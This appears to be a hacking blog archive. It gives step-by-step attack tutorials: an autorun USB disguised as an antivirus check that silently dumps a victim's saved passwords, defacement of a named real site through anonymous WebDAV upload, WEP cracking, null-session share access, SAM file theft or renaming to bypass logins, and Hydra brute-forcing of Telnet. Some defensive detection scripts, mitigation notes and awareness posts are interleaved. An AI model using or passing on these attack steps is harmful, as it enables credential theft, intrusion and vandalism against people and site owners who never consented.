Hacking.

HOW TO TURN YOUR USB INTO HACKING USB

This article explains how to turn your USB drive into a "hacking USB", which you just have to insert into a person's computer, and all of the passwords stored on that computer will be saved to the USB.

THE THINGS YOU NEED:

1) A USB DRIVE at least 100mb
2) MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications: (DOWNLOAD HERE)
3) Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook Express, Windows Mail, POP3, etc. (DOWNLOAD HERE)
4) Protected Storage PassView (PSPV) - Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer. (DOWNLOAD HERE)
5) IE PassView - IE PassView is a small program that helps us view stored passwords in Internet Explorer. (DOWNLOAD HERE)
6) Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox. (DOWNLOAD HERE)
NOTE: TURN OFF THE ANTIVIRUS DURING DOWNLOAD.


HOW TO PREPARE USB:

Now that you have downloaded all the files, copy their setup files onto the USB (e.g. mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe).

STEP 1) Now open a new notepad and Type following command as it is:


=======================================================
[autorun]
open=launch.bat

ACTION = ANTIVIRUS CHEAK

Now save this notepad as autorun.inf (remember to choose All files from save as type.)


STEP 2) Now Open a New Notepad and Copy following command as it is.

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

Now save this file as launch.bat (remember to choose All files from save as type).

STEP 3) Copy all the setups, autorun.inf and launch.bat to the USB.

Now, when you insert the USB into the victim's computer, the setup will show that it is scanning while it steals all the passwords from the computer.

NOTE: Turn Off the Antivirus from the Victim’s Computer.
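
For defenders, the autorun.inf / launch.bat pair described above leaves a recognisable footprint on the drive. The following Python triage script is an added example, not part of the original post: it parses an autorun.inf, follows any batch file it launches, and flags the tool names and the /stext switch this article uses. The function names and the in-memory sample drive are constructed for illustration.

```python
# Password-recovery executables named in the article above.
KNOWN_TOOLS = {"mspass.exe", "mailpv.exe", "iepv.exe", "pspv.exe", "passwordfox.exe"}
# autorun.inf keys that make Windows start a program from the drive.
LAUNCH_KEYS = {"open", "shellexecute", "shell\\open\\command"}


def parse_autorun(text):
    """Return {key: value} for the [autorun] section (keys lower-cased)."""
    entries, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def scan_script(text):
    """Flag batch lines that run a known tool or dump results with /stext."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        lowered = line.lower()
        tools = sorted(t for t in KNOWN_TOOLS if t in lowered)
        dumps = "/stext" in lowered
        if tools or dumps:
            findings.append({"line": number, "tools": tools, "dumps_to_file": dumps})
    return findings


def triage_drive(files):
    """files maps file name -> text content for the drive's root directory."""
    by_name = {name.lower(): body for name, body in files.items()}
    report = {"launchers": [], "script_hits": {}, "suspicious": False}
    autorun = by_name.get("autorun.inf")
    if autorun is None:
        return report
    for key, value in parse_autorun(autorun).items():
        if key not in LAUNCH_KEYS:
            continue
        target = value.split()[0].strip('"').lower() if value else ""
        report["launchers"].append((key, target))
        # Follow the launcher into a batch file stored on the same drive.
        if target.endswith((".bat", ".cmd")) and target in by_name:
            hits = scan_script(by_name[target])
            if hits:
                report["script_hits"][target] = hits
    report["suspicious"] = bool(report["script_hits"])
    return report


# Constructed sample: the two files as the article has the reader create them.
SAMPLE_DRIVE = {
    "autorun.inf": "[autorun]\nopen=launch.bat\nACTION = ANTIVIRUS CHEAK\n",
    "launch.bat": (
        "start mspass.exe /stext mspass.txt\n"
        "start mailpv.exe /stext mailpv.txt\n"
        "start iepv.exe /stext iepv.txt\n"
        "start pspv.exe /stext pspv.txt\n"
        "start passwordfox.exe /stext passwordfox.txt\n"
    ),
}

if __name__ == "__main__":
    result = triage_drive(SAMPLE_DRIVE)
    print("suspicious:", result["suspicious"])
    for name, hits in result["script_hits"].items():
        for hit in hits:
            print(name, hit)
```

On managed Windows hosts the underlying mitigation is to disable AutoRun for all drive types (the NoDriveTypeAutoRun policy value), so that autorun.inf on removable media is never honoured.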

HOW TO HACK WEBSITE WITH IIS EXPLOIT. [TUTORIAL]



In the IIS exploit we can upload a defaced page to the vulnerable server without any login. It is the easiest way to hack any site.

STEP 1: Click on Start button and open "RUN".

STEP 2: Now type this in RUN:
%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}


Now A Folder named "Web Folders" will open.


STEP 3: Now "Right-Click" in the folder and go to "New" and then "Web Folder".


STEP 4: Now type the name of the Vulnerable site in this. e.g." http://autoqingdao.com/ " and click "Next".

STEP 5: Now Click on "Finish"

STEP 6: Now the folder will appear. You can open it and put any deface page or anything in it.

STEP 7: I put a text file named "securityalert.txt" in that folder (you can put a shell or HTML file also). If the file appears in the folder then the hack is successful, but if it doesn't then the site is not vulnerable.

Now, to view the uploaded file, I will go to "http://autoqingdao.com/securityalert.txt".
In your case it will be "www.[sitename].com/[file name that you uploaded]".
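
"Web Folders" is Windows's WebDAV client, so the upload above reaches the server as an unauthenticated PUT, followed by a GET for the same path. The following Python detector is an added example, not part of the original post: it reads IIS W3C logs and reports anonymous write requests that succeeded, plus paths that were written anonymously and then fetched. The log lines, IP addresses and function names are constructed for illustration.

```python
WRITE_METHODS = {"PUT", "MKCOL", "MOVE", "COPY", "DELETE", "PROPPATCH"}


def parse_w3c(lines):
    """Yield one dict per request, using the '#Fields:' header for column names."""
    fields = []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def is_anonymous_write(row):
    """True when an unauthenticated client successfully changed server content."""
    return (
        row.get("cs-method", "").upper() in WRITE_METHODS
        and row.get("cs-username", "-") == "-"      # "-" means no authenticated user
        and row.get("sc-status", "").startswith("2")
    )


def anonymous_writes(lines):
    """Return (client IP, method, path, status) for every anonymous write."""
    return [
        (row.get("c-ip"), row["cs-method"], row.get("cs-uri-stem"), row["sc-status"])
        for row in parse_w3c(lines)
        if is_anonymous_write(row)
    ]


def written_then_fetched(lines):
    """Paths PUT anonymously and later served with 200 to a GET (the check in STEP 7)."""
    written, confirmed = set(), []
    for row in parse_w3c(lines):
        path = row.get("cs-uri-stem", "").lower()
        if is_anonymous_write(row) and row["cs-method"].upper() == "PUT":
            written.add(path)
        elif (row.get("cs-method") == "GET" and row.get("sc-status") == "200"
              and path in written and path not in confirmed):
            confirmed.append(path)
    return confirmed


# Constructed sample log; addresses are documentation ranges, not real hosts.
SAMPLE_IIS_LOG = [
    "#Software: Microsoft Internet Information Services 6.0",
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port "
    "cs-username c-ip cs(User-Agent) sc-status",
    "2012-12-01 10:01:02 192.0.2.10 GET /index.htm - 80 - 198.51.100.7 Mozilla/4.0 200",
    "2012-12-01 10:02:11 192.0.2.10 PROPFIND / - 80 - 203.0.113.5 Microsoft-WebDAV-MiniRedir/5.1.2600 207",
    "2012-12-01 10:02:15 192.0.2.10 PUT /securityalert.txt - 80 - 203.0.113.5 Microsoft-WebDAV-MiniRedir/5.1.2600 201",
    "2012-12-01 10:02:40 192.0.2.10 GET /securityalert.txt - 80 - 203.0.113.5 Mozilla/4.0 200",
    "2012-12-01 10:05:00 192.0.2.10 PUT /docs/report.doc - 80 editor 198.51.100.9 Microsoft-WebDAV-MiniRedir/5.1.2600 201",
    "2012-12-01 10:06:00 192.0.2.10 PUT /blocked.txt - 80 - 203.0.113.8 Microsoft-WebDAV-MiniRedir/5.1.2600 403",
]

if __name__ == "__main__":
    for hit in anonymous_writes(SAMPLE_IIS_LOG):
        print("anonymous write:", hit)
    print("written then fetched:", written_then_fetched(SAMPLE_IIS_LOG))
```

On the server side the fix is to disable WebDAV where it is not needed, or to remove write permission for the anonymous account on the web root.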

Monday, December 24, 2012

Learn to Detect Hidden Trojans/Viruses/Keyloggers On Your PC


 
Are you aware that there is a hidden Trojan, virus or keylogger working on your PC and sending your logins to hackers?

If you are in that situation, you don't need to worry anymore. In this post I will show you a security software called Process Revealer that can detect and kill hidden processes.



Process Revealer Free Edition is a free hidden process detector that reveals what does not appear in standard detection utilities like Windows Task Manager. Process Revealer provides detailed information about each process running on your computer to help you know if a process is related to a malicious program. Hidden programs are automatically highlighted in the interface and can be removed in one click.

Sunday, December 2, 2012

Scammers steal credit card details in ways you never thought of


Cyber criminals and malicious scammers are constantly at work to devise new ways to steal confidential user data. Unfortunately, such attacks are not just restricted to the Internet. A recently discovered spate of attacks enables scammers to steal credit/debit card details and these methods are increasingly carried out in the physical world.
In brief, here are the 5 most common places from where credit/debit card data can be stolen:
  • Restaurants and retail stores
  • Online shopping portals
  • Hacked email accounts
  • ATM machines
  • Thieves and pickpockets
Restaurants and retail stores
Some scammers have devised ways to tamper with the card readers at retail stores. Malicious smart cards that look like legitimate cards are created and then inserted into the machines to make a payment. However, the machine simply says that an error has occurred and the retail store merchant is unaware of the damage that has been done. When a genuine payment is made with a valid card over the same machine in the future, the details of that card get recorded. Now the scammer revisits the store after a day or two and inserts the fraudulent card into the machine to make another seemingly innocent payment. Details about all the cards that have been inserted in the interim period are now transferred into the malicious card which can be viewed by the scammer via another device.
Online shopping portals
The best online shopping portals mandatorily use secure methods to protect user details. Unsecure portals are susceptible to hackers and can easily lose data to scammers. There have been several instances where major online portals have been breached and card details have been stolen and misused. From a customer's perspective, it is advisable to be aware of the concept of SSL and security certificates. Additionally, the best Internet security software installed on a machine can also detect fraudulent pages and portals.
Hacked email accounts
Many people receive and pay their credit card bills via email. So if a hacker manages to gain access to an email account, he can cause a lot of trouble. It is imperative to use various tools for email protection like two-factor authentication, strong and unique passwords etc. Mail services like Gmail and Yahoo also offer other methods to check if your account has been hacked into, and these are worth exploring as well.
ATM Machines
Theft of card data from ATM machines is known as ‘skimming’. This is accomplished with the help of simple card reading equipment and a small camera that records an individual when he punches in his PIN. Scammers also use equipment that replicates the magnetic strip of cards. However, various steps can be taken to avoid such attacks and this includes shielding your hand while typing the PIN and being aware of suspicious looking machines.
Thieves and pickpockets
Physical loss of possession of cards is the biggest risk in this scenario. It is advisable to report a card loss to the concerned bank and local authorities as soon as possible. Another noteworthy precaution is to monitor card statements and activity for any signs of malicious activity.
Credit/debit card usage is convenient yet dangerous, as scammers have come up with several innovative methods to gain such information. Readers are advised to stay vigilant and follow various safety measures to remain protected.

Saturday, November 24, 2012

What is Keylogger & How to Find it in a Computer System


Are you aware of a software which works in the background of a computer system? It also tracks every keystroke on the computer on which it is installed.
A keylogger is the software we are talking about. Let us throw some light on it so you can find it on your computer system.
There are two types of keylogger -
  1. Hardware keylogger – It is usually used in cyber cafes to hack the Id and Password of users
  2. Software keylogger - It is used on remote computers. It can provide all logs of texts entered on the installed computer.
Let’s look into their details

 Hardware Keylogger :

A hardware keylogger is a device which you can simply plug into a computer's keyboard cable and which starts tracking keystrokes instantly. It takes very little time (less than 5 seconds) to install; all you need to do is plug it in. It also doesn't require logging into the computer to install. It can be installed on any operating system, and if the operating system crashes, the data inside the keylogger will remain intact.

 Software Keylogger : 

A software keylogger is software which can be installed only by logging into the computer system using a password and administration privileges. It can record all operating system events such as page size, keystrokes etc. The main drawback of this software is that it can be detected by antivirus software.

 How to Find Keylogger in a Computer :

Essence lies in knowing if someone has secretly installed keylogger in your system. Here are a few steps to find the keylogger in a computer.
Step 1: Press Ctrl+Alt+Del simultaneously and check the task list. If you are unsure about a running task, examine all the running tasks immediately.
Step 2: Check all the installed programs in your system through control panel.
Step 3: Run your antivirus program to detect keylogger in your system.
Step 4: Download keylogger scanner program from internet and scan your system.
Step 5: Type “msconfig” in run box and check all startup programs.
Step 6: On public computers, you need to check keyboard port attached with CPU to detect hardware keylogger.

Saturday, October 13, 2012

WEP Cracking(WIFI)!!

First of all, for those who don't know, I will explain what WEP actually is.

WEP is an abbreviation of Wired Equivalency Protocol, but in layman's terms it's a way for you to secure your wireless communication through a method of encryption, usually already built into a wireless device with several options, in order to keep neighbours out.

Method for cracking WEP, or in short, breaking Wi-Fi security:

Here is how it can be done:
1. Run Kismet to find your target network. Get the SSID and the channel.
2. Run Airodump and start capturing data.
3. With Aireplay, start replaying a packet on the target network. (You can find a ‘good packet’ by looking at the BSSID MAC on Kismet and comparing it to the captured packet’s BSSID MAC).
4. Watch as Airodump goes crazy with new IVs. Thanks to Aireplay.
5. Stop Airodump when you have about 1,000 IVs.
6. Run Aircrack on the captured file.
7. You should see the WEP key in front of you now.
Cheers

List of programs used:

-Kismet
Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system.
It is designed for Linux.
You can download it at KISMET
A windows version can be downloaded at Kismet Windows Version

-Aircrack (Includes Airodump, Aireplay, Aircrack and optional Airdecap for decrypting WEP/WPA capture files)

-Aircrack is the 802.11 WEP and WPA-PSK key cracking program that can recover these keys once enough encrypted packets have been captured with airodump.

-Airdecap is used to decrypt WEP/WPA capture files.

-Airmon can be used to configure the wireless card.

-Aireplay is used to inject frames.

-Airodump is used for packet capturing of raw 802.11 frames and is particularly suitable for collecting WEP IVs (initialization vectors) for the intent of using them with aircrack-ng.
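
Why the IVs matter, as an added example that is not part of the original post: WEP builds each frame's RC4 key from a 24-bit IV sent in the clear followed by the shared secret, so IVs repeat, and a repeated IV means a repeated keystream. The Python code below uses a constructed key and constructed frames, leaves out the CRC-32 integrity value, and assumes randomly chosen IVs for the birthday estimate.

```python
import math


def rc4_keystream(key, length):
    """Standard RC4: key scheduling followed by `length` output bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(length):
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) % 256])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv, secret, plaintext):
    """WEP-style encryption: the per-frame RC4 key is IV || secret (ICV omitted)."""
    return xor(plaintext, rc4_keystream(iv + secret, len(plaintext)))


def frames_for_collision(iv_bits=24, probability=0.5):
    """Birthday bound: frames sent before two share an IV with the given probability.

    Assumes IVs are picked at random; devices that count up from zero after
    every reset repeat IVs even more predictably.
    """
    space = 2 ** iv_bits
    return math.ceil(math.sqrt(2 * space * math.log(1 / (1 - probability))))


def demo_iv_reuse():
    """Encrypt two constructed frames under the same IV and show what leaks."""
    secret = bytes.fromhex("0102030405")       # constructed 40-bit key
    iv = bytes.fromhex("a1b2c3")               # the same 24-bit IV on both frames
    frame_a = b"constructed frame number"      # constructed plaintexts, 24 bytes each
    frame_b = b"another made-up payload!"
    cipher_a = wep_encrypt(iv, secret, frame_a)
    cipher_b = wep_encrypt(iv, secret, frame_b)
    leak = xor(cipher_a, cipher_b)             # the keystream cancels out
    return {
        "xor_of_ciphertexts_equals_xor_of_plaintexts": leak == xor(frame_a, frame_b),
        # Knowing one plaintext reveals the other without knowing the key.
        "frame_b_from_known_frame_a": xor(leak, frame_a),
    }


if __name__ == "__main__":
    print(demo_iv_reuse())
    print("frames for a 50% chance of a repeated IV:", frames_for_collision())
```

The remedy is to retire WEP in favour of WPA2 or WPA3; a longer WEP key does not change the 24-bit IV.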

Download the whole suite at:

Download Whole Suite

Thursday, August 16, 2012

MAC ADDRESS SPOOFING



"An approach to introduce people to the truth of HACKING". Today, in this post, I'll tell you how you can spoof your MAC address. Every Network Interface Card (NIC), or network adapter, in this world is given a unique MAC address, or Media Access Control address. This number is given by the manufacturer for identification purposes.
Usually a MAC address is written as a 12-digit hexadecimal number. For example 00-45-32-K5-D7-23.
If your computer has an Ethernet network adapter and a wireless network adapter, then each of them will have a different MAC address.
On a Windows computer, if you want to find out the MAC address of your network adapter, open a command prompt and type ipconfig /all

MAC ADDRESS SPOOFING

MAC address spoofing is the art of changing your MAC address. You can easily change your MAC address with the following steps.
  • Download one of my favorite command line tools, called Ether Change (Download).
  • Go to the command prompt and type ipconfig /all to check your current MAC address.
  • Run the etherchange tool from the command line to change your MAC address.
  • Select the network adapter by its assigned number and write the new 12-digit hexadecimal MAC address without any spaces, then press Enter. Your MAC address is now changed.

Wednesday, April 25, 2012

Advanced Novell Hacking

This short section will discuss various advanced Novell hacking techniques. These involve using
programs such as port scanners, keyloggers, trojans and password crackers. I will also be looking
at File and Print Sharing (Legion V2.1, Sid2User - User2Sid, DumpSec), as well as some tips and
tricks with navigating around the network, including the "net use" command.

Firstly, let's look at various methods of hacking the network using specific programs. Although
this section may offend some people, it is nevertheless an essential part of Novell security. It
is an unfortunate fact that many people these days want to hack someone to be "cool" in the eyes
of their friends. These people have little or no morals, and almost always possess absolutely no
skill what so ever. All they care about is getting what they want, and they don't care how they
get it. Because of their lack of skill, these people usually rely solely on programs to do their
dirty work (if they don't have a friend who does it for them). If anybody like this is reading
this, I spit on you.

On the other hand, there are many skilled hackers out there who also turn to programs which
automate the process for a variety of reasons, usually because it is easier and usually more
effective to use programs.

As with any hack, there is one tool that you simply cannot live without. A port scanner. There
has been much debate over which port scanner is the best, what the pros and cons of each
scanner are etc. Many say Nmap, but I often find there's no need to waste time with such an advanced
scanner. The problem with Nmap is that it is too complicated for quick and easy use. Nmap is
good for home use, when you have a lot of time on your hands to try out various scans. In my
humble opinion, the best scanner for a Novell network is Angry IP Scanner by Angryziber
(angryziber@angryziber.com). Angry IP allows for lightning fast port scans on huge networks,
with great accuracy. It has some built in features like being able to establish connections over
HTTP, FTP and Telnet, as well as being able to Traceroute. It also has cool things like
"favourites" and being able to tell you many things about the target, such as Hostname, Comp.
Name, Group Name, User Name, MAC address and TTL. On top of all this, it can be used from the
command line! Anyway, it has many more features that you need to explore yourself. For now, all
we really need to be focussing on is its efficient simple port scanning features.

First of all, you will need to get the IP of some computers on your network. If you have been
reading this tutorial carefully instead of just skipping to this section, you will remember that this
can be done using the netstat command in DOS (btw, if you still can't get DOS then you are really
dumb - no offence). You really only need one IP, because most, if not all of the IP's on the
network will have the same Network Number and Host Number. So, if you can see that your IP is
123.123.12.123, you should only scan IP's that have the same Network Number and Host Number. In
the case of the example, you would enter the start IP as 123.123.12.1 and the end IP as
123.123.12.255. First you should scan using only one port because you want to know exactly how
many computers you are potentially dealing with. If you put too many ports, you will be waiting
ages for your results if there are heaps of computers on the network. An alternative to this
would be to use the "net view" command.

C:\>net view

This displays all the computers connected to the network that you are currently on. This command
can be used to get further information about an individual machine by typing:

C:\>net view \\SOMECOMPUTER
==============================
Disk | share name

C:\>net view \\workgroup:TARGETWG (gives all computers in workgroup)
C:\>net view \\domain:TARGETD (gives all computers in domain)

Anyway, it would be best to specify the port as TCP 139, which you should all know as NetBIOS.
If this is open on any computers (and it damn well should be, you are on a network), you may be
able to get access to that computers hard drive. Go into DOS, and type in:

C:\>net use \\ADMINCOMPUTER\IPC$ "" /u:""

If you have even the slightest experience in hacking, you would have seen this command a
thousand times before. For those who haven't, all you are doing is attempting to connect to computer
"ADMINCOMPUTER" using the inbuilt IPC$ share with a null password "" and an anonymous user
/u:"". If this doesn't work, you can try substituting the password for a wildcard * or even the
account, so you can have:

C:\>NET USE \\ADMINCOMPUTER\IPC$ "" /u:""
C:\>NET USE \\ADMINCOMPUTER\IPC$ * /USER:""
C:\>NET USE \\ADMINCOMPUTER\IPC$ * /USER:

They all do the same thing, but sometimes only certain ones will work on certain machines. If
you are unlucky, you could try to substitute the IPC$ for ADMIN$ or C$. These are just
additional default shares. The difference between ADMIN$, C$ and IPC$ is that IPC$ cannot be
removed. This means that you should always be able to establish a connection. Of course, the
admin may want to create additional shares such as A$ (remote floppy drive), E$ (remote
CD drive) and really anything he wants. An admin can quite easily create and delete shares using
the "net share" command:

C:\>net share ADMIN$ /delete
Command completed successfully

This command deletes the remote administrator ADMIN$ share. Shares can be added by typing:

C:\>net share A$ a:
Command completed successfully.

This tells the computer to create a share A$ with the target to the a: drive.

I said earlier that it is possible to disconnect the a: drive from the network, thus enabling it
for our own usage. This can be done using the command:

C:\>net use a: /delete

Unfortunately, this command can be restricted by the administrator. Once it is, no command with
the prefix "net" will work. On the bright side, it is rare for an admin to realise that anybody
has been ******* with net use commands and establishing connections, let alone disable the
command. If the command does get disabled, we are forced to turn to programs to do our dirty
work.

Although there are a number of Netbios scanners, most of them are rather dated as these days few
hackers seriously rely on Netbios as their main weapon. Sure, it can be fun and rewarding, but
most computers these days have patches to guard against unauthorised access, or simply block
access to TCP 139 through their firewall or router. As a result, most people have stopped making
new Netbios programs. Because of this, most of the programs for Netbios are old. REALLY old.
We're talking old as in 1999 old. Sure, doesn't seem like that long ago, but in the computer
world, that is an eternity. Luckily for us, this is slightly different for networks. Because a
network has to be tied together very closely, it usually depends on port 139 to handle all the
traffic. As a result, most old programs will work like a charm. Although there are many, many
different programs you can use to try and get the shares, I recommend you use Legion V2.1 from
the now dead Rhino9 Security Group. It generally floats among internet sites.

Now let's take a quick look at the Security Accounts Manager (SAM). SAM is a way of storing
users details on the computer. It has usernames and password hashes inside, so it is very
important to keep safe from prying eyes. If you're the one with those eyes, SAM may just be your
goal. To cut the long story short, SAM cannot be accessed while anyone is logged onto that
computer. So what you have to do is restart it in DOS and try and copy it from there onto
floppy. The only problem with this is that sometimes SAM can be very big - a couple of Mb even
so floppy disk is an unlikely alternative. If the computer doesn't have a burner then it is
unlikely that you will be able to extract the hashes, so try and make the best of it any way you
can. Sometimes it's even possible to rename the SAM file by restarting in DOS and typing:

ren C:\winnt\repair\sam wateva

This will make the SAM file unreadable, so if the passwords are stored on the computer rather
than the server, they will all be useless. If this works, you will be able to log on without a
username or password. If you are able to extract the SAM file, there are many different password
crackers that you can use to take a peek at what's inside. L0pht, Cain and Abel and many more
do a splendid job. Try them out and see what works for you.

Finally, I'll just show you one last thing that will freak the hell out of your admin if he ever
sees it. It is ridiculously easy to access the server on most networks and nobody even considers
this method. Simply create a shortcut to it!!! If you can find a way to find the hostname of
your server, all you have to do is right click, select new then click on shortcut. In the space
provided, type the hostname of the server. For example, if the server is called "server-1" then
in the shortcut type:

\\server-1

Then click next and that's it! You can double click on the shortcut and you will have access to
all the files on the server!!! As I said before, this will scare the hell out of any admin
because he wouldn't have thought of it himself and has definitely not seen this before.
As for how much you can actually do - that depends entirely on the server. Most times
you will just browse but sometimes, who knows?

Lastly, we will take a quick look at the SUBST command. The SUBST command associates
a path with a drive letter. This means it creates a virtual drive on top of an actual one. This can
be extremely handy when the administrator has blocked off, say, the C: drive from being viewed.
Often the admin simply restricts access to the C: drive by not showing the icon for the drive. If this
is the case, simply open up a command prompt and type:

explorer c:

This will open explorer to the C: drive. Generally one will not be so lucky. The C: drive itself is
often restricted and trying to open explorer through command will tell us we don't have permission.
SUBST allows us to get past this. Open up a command prompt and type in:

subst z: C:\

where z: is the virtual drive you wish to create and C:\ is the path of the drive you wish to view.
Now all you have to do is type...

explorer z:

...and an explorer window will pop up showing you the contents of C: but in the z: drive. You may
navigate this at will just as you would normally on an unrestricted computer. Although
useful, SUBST really only gives you a graphic interface since we may view the entire contents of a
drive through command.

***Note: SUBST will also add the virtual drive to My Computer. If you have access to My Computer
you will see z: as well.

If you are having trouble with command because you cannot scroll up
whilst trying to use dir, try using dir /w or /p instead. Otherwise...

dir >> H:\dir.txt

...will send the results of the dir to a file called dir.txt (or will create the file if it does not already
exist) on the H: drive. Also note that on large networks net view can also be a pain, but using

net view >> H:\net.txt

we can see all the computers in a text file!

Friday, February 17, 2012

Basics of cracking FTP and Telnet accounts

Most of us crave direct download links so that we can download at the highest possible speed. The more intelligent of us sniff out forums and DDL / WAREZ sites for direct links and to get unethical stuff. But as the saying goes, “Give a man a fish and you feed him for a day. Teach a man to fish and you feed him for a lifetime”. After a flurry of emails about how to crack FTP/POP3/Telnet accounts, I decided to post an article on the above stated topic. One of the easy ways of hacking is brute forcing. You can quickly hack accounts if you have a decent sized password dictionary. I personally use one of about 3.16GB in size, but for this tutorial I'm only going to use a small password list, just so you get the feel of it.
Here is how to do that.
The first step is to download Hydra from its homepage (www.thc.org/thc-hydra/). Choose the Windows version and hit download. Download the zip file, extract it, and make sure you see the files below:


[Screenshot: download hydra and extract it]
If you do, that's good. Go to Start > Run > cmd to open the command prompt. Then change to your hydra folder using the “cd” command. For example, my hydra folder was on the desktop, so I did this:
[Screenshot: navigate to hydra directory]
Now that you've done this, it's time to execute Hydra for the first time! Sorry Windows fans, but there is only a GUI for Hydra for Linux systems, so you're gonna have to do it the old fashioned way. Just type “hydra.exe” without quotes, and watch the result:
[Screenshot: execute hydra]
Now we have to find some IPs to attack, and we will do it by IP scanning using Nmap. You can download it from here – make sure to download the Windows installer. After installing it, find out your IP address, so that you know a possible IP range. In the command prompt session, type “ipconfig” and watch the results:


[Screenshot: run ipconfig]
In my case, the range is at least 10.1.1.1-4, but I'll go from 1 to 10 just to be safe. Fire up Nmap and do a ping scan “nmap -sP 10.1.1.1-10” to see what hosts are alive, and wait for the results:
[Screenshot: do an NMAP scan]
Pick a host to port scan – I picked 10.1.1.1 because it is a router, and for most people the password is generally pretty simple, if not default. Port scan it using something like “nmap -sS -sV -P 0 -T5 -O 10.1.1.1” and see if it's running any services (click on the “Ports/Hosts” tab at the end for a simpler view of the services running and their ports). If you don't understand how to use Nmap, read the basics here.



[Screenshot: lets hack a telnet account]
Now we will be attacking the Telnet port because I know that it works, because I know you guys think Telnet is the be-all and end-all of hacking, and because the Windows version of THC-Hydra isn't compiled with LIBSSH support (unless you did it yourself), and as such I can't attack SSH – otherwise I'd be doing that instead. It's so much better. Head back to your command session, and review the output from Hydra before; it tells you the services it can crack. After looking through it, and realising that Telnet definitely is there, we can now proceed to attack it with the command
hydra -l admin -P passlist.txt 10.1.1.1 telnet
as is demonstrated here:
[Screenshot: telnet hacked, note the circled password]
An explanation of the command: -l admin was used because I assumed that the router would have the login of “admin”. You can use username lists as well if you wish. -P passlist.txt specified a password dictionary named “passlist.txt” - make sure to have the -P include the capital P, otherwise you'll be specifying a password to try. 10.1.1.1 is the router's IP address, and telnet is the protocol we want to attack. Now obviously we could tell it to attack that protocol on a different port, but we won't bother with that right now unless anyone else wants to see how. My dictionary only included 4 words for the purpose of this tutorial. You can see the cracked password circled at the end (which by the way, isn't my password for the router, for those of you who know how to get my IP and wanna try and break in :P). And that's how to do a basic hydra service crack on Windows.
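
On the receiving end, a dictionary run like the one above shows up as a burst of failed logins for one account from one address. The following Python detector is an added example, not part of the original post: it applies a sliding-window threshold to login events and marks the case where the guessing source eventually logs in. The log format, the sample lines and the function name are constructed assumptions; real Telnet and FTP services each log differently.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log format (an assumption for this example):
#   <ISO timestamp> <service> login <failed|ok> user=<name> src=<ip>
LINE = re.compile(
    r"^(?P<ts>\S+) (?P<svc>\w+) login (?P<result>failed|ok) "
    r"user=(?P<user>\S+) src=(?P<src>\S+)$"
)


def detect_guessing(lines, threshold=5, window_seconds=60):
    """Flag (source, service) pairs with `threshold` failed logins inside the window.

    Returns {(src, svc): {"first_failure", "failures", "succeeded"}}.
    "succeeded" becomes True if the flagged source later logs in successfully,
    which calls for incident response rather than just blocking the address.
    """
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)  # failures still inside the sliding window
    alerts = {}
    for line in lines:
        match = LINE.match(line.strip())
        if match is None:
            continue  # not a login event
        when = datetime.fromisoformat(match["ts"])
        key = (match["src"], match["svc"])
        if match["result"] == "failed":
            queue = recent[key]
            queue.append(when)
            while when - queue[0] > window:
                queue.popleft()  # drop failures that fell out of the window
            if key in alerts:
                alerts[key]["failures"] += 1
            elif len(queue) >= threshold:
                alerts[key] = {
                    "first_failure": queue[0],
                    "failures": len(queue),
                    "succeeded": False,
                }
        elif key in alerts:
            alerts[key]["succeeded"] = True
    return alerts


# Constructed sample: one mistyped password, then a dictionary run against "admin".
SAMPLE_LOG = [
    "2012-02-17T10:00:00 telnet login failed user=operator src=10.1.1.2",
    "2012-02-17T10:00:05 telnet login ok user=operator src=10.1.1.2",
    "2012-02-17T10:03:00 telnet login failed user=admin src=10.1.1.4",
    "2012-02-17T10:03:01 telnet login failed user=admin src=10.1.1.4",
    "2012-02-17T10:03:02 telnet login failed user=admin src=10.1.1.4",
    "2012-02-17T10:03:03 telnet login failed user=admin src=10.1.1.4",
    "2012-02-17T10:03:04 telnet login failed user=admin src=10.1.1.4",
    "2012-02-17T10:03:05 telnet login failed user=admin src=10.1.1.4",
    "2012-02-17T10:03:06 telnet login ok user=admin src=10.1.1.4",
]

if __name__ == "__main__":
    for (src, svc), info in detect_guessing(SAMPLE_LOG).items():
        print(src, svc, info)
```

Detection is the backstop here; the durable fixes are replacing default credentials, limiting or locking out repeated failures, and turning Telnet off in favour of an encrypted management protocol.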

